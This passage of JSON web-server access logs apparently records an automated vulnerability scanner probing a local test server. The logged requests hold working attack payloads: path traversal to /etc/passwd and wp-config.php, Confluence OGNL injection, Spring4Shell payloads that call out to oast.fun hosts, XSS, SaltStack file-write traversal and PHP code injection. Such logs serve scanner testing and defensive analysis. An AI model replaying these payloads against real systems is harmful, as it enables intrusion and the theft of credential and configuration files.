+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%u002e/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Electron/download/windows/%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.400","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.371","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /net/net/net.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.374","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/82 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.497","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.364","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.376","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deltaweb/hmi_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.337","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.380","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.412","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.386","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.388","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /emergency.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.508","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/mc4wp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.315","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.174","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"{\x22client\x22:\x22wheel_async\x22,\x22fun\x22:\x22pillar_roots.write\x22,\x22data\x22:\x22testing\x22,\x22path\x22:\x22../../../../../../../tmp/testing\x22,\x22username\x22:\x221\x22,\x22password\x22:\x221\x22,\x22eauth\x22:\x22pam\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.233","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.340","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /document.php?modulepart=project&file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"btnPost=Log+In&username={{username}}&password=0a7ef986b3b5ab8a809774cf3d09ec16&savedate=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zb_system/cmd.php?act=verify HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.071","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /website/lang/en_US?r=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/83 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.084","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.085","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/backup-db/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"json={\x22url\x22:\x22/general/../../mysql5/my.ini\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ispirit/interface/gateway.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.092","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.086","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?class.module.classLoader.resources.context.configFile=https://c9v8h8gsmpv8c1qg07h09zdaowx91rsif.oast.fun&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/default/view.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/luci HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dotAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%252f%255cexample.com%252fa%253fb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /document.php?modulepart=project&file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /explore/snippets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/84 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"class.module.classLoader.resources.context.configFile=https://c9v8h8gsmpv8c1qg07h0nrq3n5k4j73hq.oast.fun&class.module.classLoader.resources.context.configFile.content.aaa=xxx\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"297MTkrDFoxThCC1TSiC8ILN8A0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /fileserver/test.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /general/status.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 